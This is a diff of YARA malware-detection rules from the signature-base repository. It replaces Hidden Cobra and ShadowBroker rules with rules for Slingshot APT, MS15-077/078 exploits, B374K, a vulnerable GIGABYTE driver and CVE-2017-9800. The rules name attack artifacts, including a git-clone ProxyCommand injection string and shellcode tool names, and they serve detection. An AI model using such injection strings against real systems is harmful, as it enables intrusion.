-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L302-L323"
+		id = "72f4a52b-c70b-511f-acf5-6d680a95c7d6"
+		date = "2018-03-09"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L60-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7d5858cc6dab094d5dceab75a2002d9145537008241a08ac7bd399c9d6e6c270"
+		logic_hash = "43cf94058fe3833a4623ecb784eea50e199536d4903fb9457843b7b5e9a244e3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4b250304e28648574b441831bf579b844e8e1fda941fb7f86a7ea7c4291bbca6"
 
 	strings:
-		$s1 = "KM.FileSystem.dll" ascii fullword
-		$op1 = { 80 3d 50 6b 04 10 00 0f 85 96 00 00 00 33 c0 40 b9 48 6b 04 10 87 01 33 db 89 5d fc }
-		$op2 = { c3 33 c0 b9 7c 6f 04 10 40 87 01 c3 8b ff 55 }
-		$op3 = { 8d 4d f4 e8 53 ff ff ff 68 d0 22 01 10 8d 45 f4 50 e8 d8 05 00 00 cc 8b 41 04 }
-		$xc1 = { 2E 64 6C 6C 00 00 00 00 41 53 4B 4F 44 00 00 00
-               53 75 63 63 65 73 73 }
+		$s1 = "SlingDll.dll" fullword ascii
+		$s2 = "BogusDll." ascii
+		$s3 = "smsvcrt -h 0x%p" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( $xc1 or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "7ead4bb0d752003ce7c062adb7ffc51a" or pe.exports ( "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW0000" ) or 1 of them )
 }
-rule SIGNATURE_BASE_Hiddencobra_Rule_1
+rule SIGNATURE_BASE_Slingshot_APT_Malware_2 : FILE
 {
 	meta:
-		description = "Detects Hidden Cobra Malware"
-		author = "US CERT"
-		id = "921c027e-fac3-5419-b0a6-5043f5cde466"
-		date = "2017-06-13"
+		description = "Detects malware from Slingshot APT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b85d3d81-0148-5ea0-9eff-d9bb63e3e75b"
+		date = "2018-03-09"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-164A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L11-L29"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L81-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e8bb844d72b7d7564caec0d0842889000c77611eeb24ac5c5cb35072a92c9d10"
+		logic_hash = "d56dadf747c64cb518ddc9aaee38fd50c67fe7344d7569d9ef3169099e7f36c5"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2a51ef6d115daa648ddd57d1e4480f5a18daf40986bfde32aab19349aa010e67"
 
 	strings:
-		$rsaKey = {7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94
-            A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 77
-            48 EE 6F 4B 9B 53 60 98 45 A5 28 65 8A 0B F8 39
-            73 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2
-            AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED
-            39 3F FA D0 AD 3D D9 C5 3D 28 EF 3D 67 B1 E0 68
-            3F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13
-            B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0}
+		$x1 = "\\\\?\\c:\\RECYCLER\\S-1-5-21-2225084468-623340172-1005306204-500\\INFO5" fullword wide
+		$x_slingshot = {09 46 BE 57 42 DD 70 35 5E }
+		$s1 = "Opening service %s for stop access failed.#" fullword wide
+		$s2 = "LanMan setting <%s> is ignored because system has a higher value already." fullword wide
+		$s3 = "\\DosDevices\\amxpci" wide
+		$s4 = "lNTLMqSpPD" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Hiddencobra_Rule_3
+
+rule SIGNATURE_BASE_Slingshot_APT_Malware_3 : FILE
 {
 	meta:
-		description = "Detects Hidden Cobra Malware"
-		author = "US CERT"
-		id = "39c7e039-4b07-575d-a93a-539ecc4e63d8"
-		date = "2017-06-13"
+		description = "Detects malware from Slingshot APT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4ef1f9a6-3d80-545e-8ac3-c6d46c71fca1"
+		date = "2018-03-09"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-164A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L52-L82"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L102-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6c0e385e46fe9d6cde7d2bc8ef059cfd8c33ef5b17e9fcd7cea97863fb8d2c24"
+		logic_hash = "420c54ce90a13258e0dd54524fe7df4dd97d3e8f1eeaa8ca14350670a87e87c6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fa513c65cded25a7992e2b0ab03c5dd5c6d0fc2282cd64a1e11a387a3341ce18"
 
 	strings:
-		$randomUrlBuilder = { 83 EC 48 53 55 56 57 8B 3D ?? ?? ?? ?? 33 C0 C7
-         44 24 28 B4 6F 41 00 C7 44 24 2C B0 6F 41 00 C7 44 24 30 AC 6F 41
-         00 C7 44 24 34 A8 6F 41 00 C7 44 24 38 A4 6F 41 00 C7 44 24 3C A0
-         6F 41 00 C7 44 24 40 9C 6F 41 00 C7 44 24 44 94 6F 41 00 C7 44 24
-         48 8C 6F 41 00 C7 44 24 4C 88 6F 41 00 C7 44 24 50 80 6F 41 00 89
-         44 24 54 C7 44 24 10 7C 6F 41 00 C7 44 24 14 78 6F 41 00 C7 44 24
-         18 74 6F 41 00 C7 44 24 1C 70 6F 41 00 C7 44 24 20 6C 6F 41 00 89
-         44 24 24 FF D7 99 B9 0B 00 00 00 F7 F9 8B 74 94 28 BA 9C 6F 41 00
-         66 8B 06 66 3B 02 74 34 8B FE 83 C9 FF 33 C0 8B 54 24 60 F2 AE 8B
-         6C 24 5C A1 ?? ?? ?? ?? F7 D1 49 89 45 00 8B FE 33 C0 8D 5C 11 05
-         83 C9 FF 03 DD F2 AE F7 D1 49 8B FE 8B D1 EB 78 FF D7 99 B9 05 00
-         00 00 8B 6C 24 5C F7 F9 83 C9 FF 33 C0 8B 74 94 10 8B 54 24 60 8B
-         FE F2 AE F7 D1 49 BF 60 6F 41 00 8B D9 83 C9 FF F2 AE F7 D1 8B C2
-         49 03 C3 8B FE 8D 5C 01 05 8B 0D ?? ?? ?? ?? 89 4D 00 83 C9 FF 33
-         C0 03 DD F2 AE F7 D1 49 8D 7C 2A 05 8B D1 C1 E9 02 F3 A5 8B CA 83
-         E1 03 F3 A4 BF 60 6F 41 00 83 C9 FF F2 AE F7 D1 49 BE 60 6F 41 00
-         8B D1 8B FE 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FB 2B F9 8B CA 8B C1
-         C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7C 24 60 8D 75 04 57 56 E8
-         ?? ?? ?? ?? 83 C4 08 C6 04 3E 2E 8B C5 C6 03 00 5F 5E 5D 5B 83 C4
-         48 C3 }
+		$a1 = "chmhlpr.dll" fullword ascii
+		$s2 = "%hc%hc%hc%hc" fullword ascii
+		$s3 = "%hc%hc%hc=" fullword ascii
+		$s4 = "%hc%hc==" fullword ascii
 
 	condition:
-		$randomUrlBuilder
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "2f3b3df466e24e0792e0e90d668856bc" or pe.exports ( "dll_u" ) or ( $a1 and 2 of ( $s* ) ) )
 }
-rule SIGNATURE_BASE_APT_Hiddencobra_Ghostsecret_1 : FILE
+rule SIGNATURE_BASE_Slingshot_APT_Malware_4 : FILE
 {
 	meta:
-		description = "Detects Hidden Cobra Sample"
+		description = "Detects malware from Slingshot APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d6955294-84a4-5694-87c9-b5b1c39e0fae"
-		date = "2018-08-11"
+		id = "0f957330-1834-550f-ba5d-fb2bf0dfba7f"
+		date = "2018-03-09"
 		modified = "2023-12-05"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L87-L101"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L124-L144"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b1e72ca66520152b444cc415bdf54921ebba9671519d3b0327316cee2bf0ba1d"
+		logic_hash = "a9f4b7b4079ebd5ffbee4c82032d28b0015968cb369fae2b0f19b054bf5a1c3c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "05a567fe3f7c22a0ef78cc39dcf2d9ff283580c82bdbe880af9549e7014becfc"
+		hash1 = "38c4f5320b03cbaf5c14997ea321507730a8c16906e5906cbf458139c91d5945"
 
 	strings:
-		$s1 = "%s\\%s.dll" fullword wide
-		$s2 = "PROXY_SVC_DLL.dll" fullword ascii
+		$x1 = "Ss -a 4104 -s 257092 -o 8 -l 406016 -r 4096 -z 315440" fullword wide
+		$s1 = "Slingshot" fullword ascii
+		$s2 = "\\\\?\\e:\\$Recycle.Bin\\" wide
+		$s3 = "LineRecs.reloc" fullword ascii
+		$s4 = "EXITGNG" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( $x1 or 2 of them )
 }
-rule SIGNATURE_BASE_APT_Hiddencobra_Ghostsecret_2 : FILE
+rule SIGNATURE_BASE_Exploit_MS15_077_078 : FILE
 {
 	meta:
-		description = "Detects Hidden Cobra Sample"
+		description = "MS15-078 / MS15-077 exploit - generic signature"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dab5b0ec-ae89-521e-bbb9-15602db9ed6c"
-		date = "2018-08-11"
+		id = "57f6db11-9d93-53fd-ab68-c6c3eadae2da"
+		date = "2015-07-21"
 		modified = "2023-12-05"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L103-L119"
+		reference = "https://code.google.com/p/google-security-research/issues/detail?id=473&can=1&start=200"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_2426.yar#L10-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "878711f5e1a8a3cfefdaf13fc08a4778fba9d2f729248784cf72b610c8bc5e17"
+		logic_hash = "354219a1ed88c891c64513a057266199919406309460d92792a4be509f9580a1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "45e68dce0f75353c448865b9abafbef5d4ed6492cd7058f65bf6aac182a9176a"
+		hash1 = "18e3e840a5e5b75747d6b961fca66a670e3faef252aaa416a88488967b47ac1c"
+		hash2 = "0b5dc030e73074b18b1959d1cf7177ff510dbc2a0ec2b8bb927936f59eb3d14d"
+		hash3 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
+		hash4 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
 
 	strings:
-		$s1 = "ping 127.0.0.1 -n 3" fullword wide
-		$s2 = "Process32" fullword ascii
-		$s11 = "%2d%2d%2d%2d%2d%2d" fullword ascii
-		$s12 = "del /a \"" fullword wide
+		$s1 = "GDI32.DLL" fullword ascii
+		$s2 = "atmfd.dll" fullword wide
+		$s3 = "AddFontMemResourceEx" fullword ascii
+		$s4 = "NamedEscape" fullword ascii
+		$s5 = "CreateBitmap" fullword ascii
+		$s6 = "DeleteObject" fullword ascii
+		$op0 = { 83 45 e8 01 eb 07 c7 45 e8 }
+		$op1 = { 8d 85 24 42 fb ff 89 04 24 e8 80 22 00 00 c7 45 }
+		$op2 = { eb 54 8b 15 6c 00 4c 00 8d 85 24 42 fb ff 89 44 }
+		$op3 = { 64 00 88 ff 84 03 70 03 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of ( $s* ) or 3 of ( $op* )
 }
-rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_1 : FILE
+rule SIGNATURE_BASE_Exploit_MS15_077_078_Hackingteam : FILE
 {
 	meta:
-		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
+		description = "MS15-078 / MS15-077 exploit - Hacking Team code"
 		author = "Florian Roth (Nextron Systems)"
-		id = "923a0812-f375-5c0c-a22c-fc71ddcad4e3"
-		date = "2019-04-13"
+		id = "3bf40dec-c46e-5054-a98e-602049cb1824"
+		date = "2015-07-21"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L124-L137"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_2426.yar#L38-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6cd036129ea54f4e3a2c52bf9ebd04e2d368e737cf83ca34a8feb79ea477a3af"
+		logic_hash = "c94582629e555c9fd0b29302720078a7eb47d3013d0c1b5edd4e060c2062fa92"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "d77fdabe17cdba62a8e728cbe6c740e2c2e541072501f77988674e07a05dfb39"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
+		hash2 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
 
 	strings:
-		$s1 = "www.naver.com" fullword ascii
-		$s2 = "PolarSSL Test CA0" fullword ascii
+		$s1 = "\\SystemRoot\\system32\\CI.dll" ascii
+		$s2 = "\\sysnative\\CI.dll" ascii
+		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" fullword ascii
+		$s4 = "CRTDLL.DLL" fullword ascii
+		$s5 = "\\sysnative" ascii
+		$s6 = "InternetOpenA coolio, trying open %s" fullword ascii
 
 	condition:
-		filesize < 1000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 5 of them
 }
-rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_2 : FILE
+rule SIGNATURE_BASE_B374K_Back_Connect : FILE
 {
 	meta:
-		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
+		description = "Detects privilege escalation tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9c7fd381-272a-5cfc-a7ee-7f0f9221fa04"
-		date = "2019-04-13"
+		id = "8612bda2-2576-56c0-a4ba-afbef419ab05"
+		date = "2016-08-18"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L139-L154"
+		reference = "Internal Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_b374k_extra.yar#L8-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "741d69b470ac230d502116ebd5f09bbf4bdbbbdd7e70b97a4bd5d3f2c8e148ef"
-		score = 75
+		logic_hash = "dd89aefb6c1add44bfe2a706cd161a16f36a649f910ace16b641a7836525aa73"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "70034b33f59c6698403293cdc28676c7daa8c49031089efa6eefce41e22dccb3"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c8e16f71f90bbaaef27ccaabb226b43762ca6f7e34d7d5585ae0eb2d36a4bae5"
 
 	strings:
-		$s1 = "%SystemRoot%\\System32\\svchost.exe -k mdnetuse" fullword ascii
-		$s2 = "%s\\hid.dll" fullword ascii
-		$s3 = "%Systemroot%\\System32\\" ascii
-		$s4 = "SYSTEM\\CurrentControlSet\\services\\%s\\Parameters" fullword ascii
+		$s1 = "AddAtomACreatePro" fullword ascii
+		$s2 = "shutdow" fullword ascii
+		$s3 = "/config/i386" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_3 : FILE
+rule SIGNATURE_BASE_Git_CVE_2017_9800_Poc : CVE_2017_9800 FILE
 {
 	meta:
-		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
+		description = "Detects a CVE-2017-9800 exploitation attempt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "683b4d64-575a-5bdb-9ad8-e10a60037032"
-		date = "2019-04-13"
+		id = "1692eec4-a9af-5d00-97b8-badbe0ba0711"
+		date = "2017-08-11"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L156-L185"
+		reference = "https://twitter.com/mzbat/status/895811803325898753"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_9800.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5cbdf0c4c5025bc1d95d27a32fa69efb329e8f74243646a31458fea225d21875"
-		score = 75
+		logic_hash = "1cfd0c5cb255d3ca63917c41c092df70d68b04f5d210a66abd5e35e509ff4beb"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525"
-		hash2 = "05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461"
-		hash3 = "ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d"
+		tags = "CVE-2017-9800, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Oleaut32.dll" fullword ascii
-		$s2 = "Process32NextA" fullword ascii
-		$s3 = "Process32FirstA" fullword ascii
-		$s4 = "%sRSA key size  : %d bits" fullword ascii
-		$s5 = "emailAddress=" fullword ascii
-		$s6 = "%scert. version : %d" fullword ascii
-		$s7 = "www.naver.com" fullword ascii
-		$x1 = "ztretrtireotreotieroptkierert" fullword ascii
-		$x2 = "reykfgkodfgkfdskgdfogpdokgsdfpg" fullword ascii
-		$x3 = "fjiejffndxklfsdkfjsaadiepwn" fullword ascii
-		$x4 = "fgwljusjpdjah" fullword ascii
-		$x5 = "udbcgiut.dat" fullword ascii
+		$s1 = "git clone ssh://-oProxyCommand=" ascii
+		$s2 = "git clone http://-" ascii
+		$s3 = "git clone https://-" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or 6 of ( $s* ) )
+		filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Auct_Dez16_Strings : FILE
+rule SIGNATURE_BASE_Darkeyev3_Cryptor : FILE
 {
 	meta:
-		description = "String from the ShodowBroker Files Screenshots - Dec 2016"
+		description = "Rule to detect DarkEYEv3 encrypted executables (often malware)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1454c5d-01bc-599b-815c-aa1a3c52be3f"
-		date = "2016-12-17"
+		id = "a2b455e5-3021-5662-b593-c1aeeb34c226"
+		date = "2015-05-24"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L11-L71"
+		reference = "http://darkeyev3.blogspot.fi/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_cryptors.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c632d90c5b26b840b267647faf453f85496b78c900910ad22896698c553c949"
-		score = 60
-		quality = 60
+		logic_hash = "fdd3a9c22aebb40d000a642f2433adc7dd591784bdf2924edc3effce7bbfa5c2"
+		score = 55
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash0 = "6b854b967397f7de0da2326bdd5d39e710e2bb12"
+		hash1 = "d53149968eca654fc0e803f925e7526fdac2786c"
+		hash2 = "7e3a8940d446c57504d6a7edb6445681cca31c65"
+		hash3 = "d3dd665dd77b02d7024ac16eb0949f4f598299e7"
+		hash4 = "a907a7b74a096f024efe57953c85464e87275ba3"
+		hash5 = "b1c422155f76f992048377ee50c79fe164b22293"
+		hash6 = "29f5322ce5e9147f09e0a86cc23a7c8dc88721b9"
+		hash7 = "a0382d7c12895489cb37efef74c5f666ea750b05"
+		hash8 = "f3d5b71b7aeeb6cc917d5bb67e2165cf8a2fbe61"
 
 	strings:
-		$s1 = "bs.ratload" fullword ascii
-		$s2 = "Auditcleaner" fullword ascii
-		$s3 = "bll.perlbind" fullword ascii
-		$s4 = "bll.perlcallback" fullword ascii
-		$s5 = "bll.telnet" fullword ascii
-		$s6 = "bll.tnc.gr" fullword ascii
-		$s7 = "clean_wtmps.py" fullword ascii
-		$s8 = "cmsex.auto" fullword ascii
-		$s9 = "cottonaxe" fullword ascii
-		$s10 = "dectelnet.sh" fullword ascii
-		$s11 = "elatedmonkey" fullword ascii
-		$s12 = "electricslide.pl" fullword ascii
-		$s13 = "endlessdonut" fullword ascii
-		$s14 = "solaris8shellcode" fullword ascii
-		$s15 = "solaris9shellcode" fullword ascii
-		$s16 = "solaris10shellcode" fullword ascii
-		$s17 = "ys.ratload.sh" fullword ascii
-		$elf1 = "catflap" fullword ascii
-		$elf2 = "charm_penguin" fullword ascii
-		$elf3 = "charm_hammer" fullword ascii
-		$elf4 = "charm_saver" fullword ascii
-		$elf5 = "dampcrowd" fullword ascii
-		$elf7 = "dubmoat" fullword ascii
-		$elf8 = "ebbshave" fullword ascii
-		$elf9 = "eggbasket" fullword ascii
-		$elf10 = "toffeehammer" fullword ascii
-		$elf11 = "enemyrun" fullword ascii
-		$elf12 = "envoytomato" fullword ascii
-		$elf13 = "expoxyresin" fullword ascii
-		$elf14 = "estopmoonlit" fullword ascii
-		$elf15 = "linux-exactchange" fullword ascii
-		$elf17 = "ghost_sparc" fullword ascii
-		$elf18 = "jackpop" fullword ascii
-		$elf19 = "orleans_stride" fullword ascii
-		$elf20 = "prokserver" fullword ascii
-		$elf21 = "seconddate" fullword ascii
-		$elf22 = "shentysdelight" fullword ascii
-		$elf23 = "skimcountry" fullword ascii
-		$elf24 = "slyheretic" fullword ascii
-		$elf25 = "stoicsurgeon" fullword ascii
-		$elf26 = "strifeworld" fullword ascii
-		$elf27 = "suaveeyeful" fullword ascii
-		$elf28 = "suctionchar" fullword ascii
-		$elf29 = "vs.attack.linux" fullword ascii
-		$pe1 = "charm_razor" fullword ascii wide
-		$pe2 = "charm_saver" fullword ascii wide
-		$pe3 = "ghost_x86" fullword ascii wide
+		$s0 = "\\DarkEYEV3-"
 
 	condition:
-		( uint16( 0 ) == 0x457f and 1 of ( $elf* ) ) or ( uint16( 0 ) == 0x5a4d and 1 of ( $pe* ) ) or 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and $s0
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Violetspirit
+rule SIGNATURE_BASE_VULN_PUA_GIGABYTE_Driver_Jul22_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file violetspirit.README"
+		description = "Detects a vulnerable GIGABYTE driver sometimes used by malicious actors to escalate privileges"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4efea734-8cbc-53f7-bf92-5b3253721a81"
-		date = "2016-12-17"
+		id = "c66b858f-a034-53e1-b0fd-e48693fc6913"
+		date = "2022-07-25"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L73-L86"
+		reference = "https://twitter.com/malmoeb/status/1551449425842786306"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_gigabyte_driver.yar#L2-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "01a45feb5c9f9cfe8834306993c53b1e53d79b89b07106ffec0c81cdebb8b71c"
-		score = 75
+		logic_hash = "8aeae559b52b8e01ceab8caba24653b949b3bec694a14b36c819b0a7c9f8b7c6"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
+		tags = "FILE"
+		hash1 = "31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427"
 
 	strings:
-		$x1 = "-i tgt_ipaddr -h tgt_hostname" fullword ascii
+		$xc1 = { 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73
+               00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 32
+               00 2E 00 33 00 37 00 39 00 30 00 2E 00 31 00 38
+               00 33 00 30 00 20 00 62 00 75 00 69 00 6C 00 74
+               00 20 00 62 00 79 00 3A 00 20 00 57 00 69 00 6E
+               00 44 00 44 00 4B 00 00 00 00 00 32 00 09 00 01
+               00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C
+               00 4E 00 61 00 6D 00 65 00 00 00 67 00 64 00 72
+               00 76 00 2E 00 73 00 79 00 73 }
+		$x1 = "AEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAuADIALgAzADcAOQAwAC4AMQA4ADMAMAAgAGIAdQBpAGwAdAAgAGIAeQA6ACAAVwBpAG4ARABEAEsAAAAAADIACQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAZwBkAHIAdgAuAHMAeQBz"
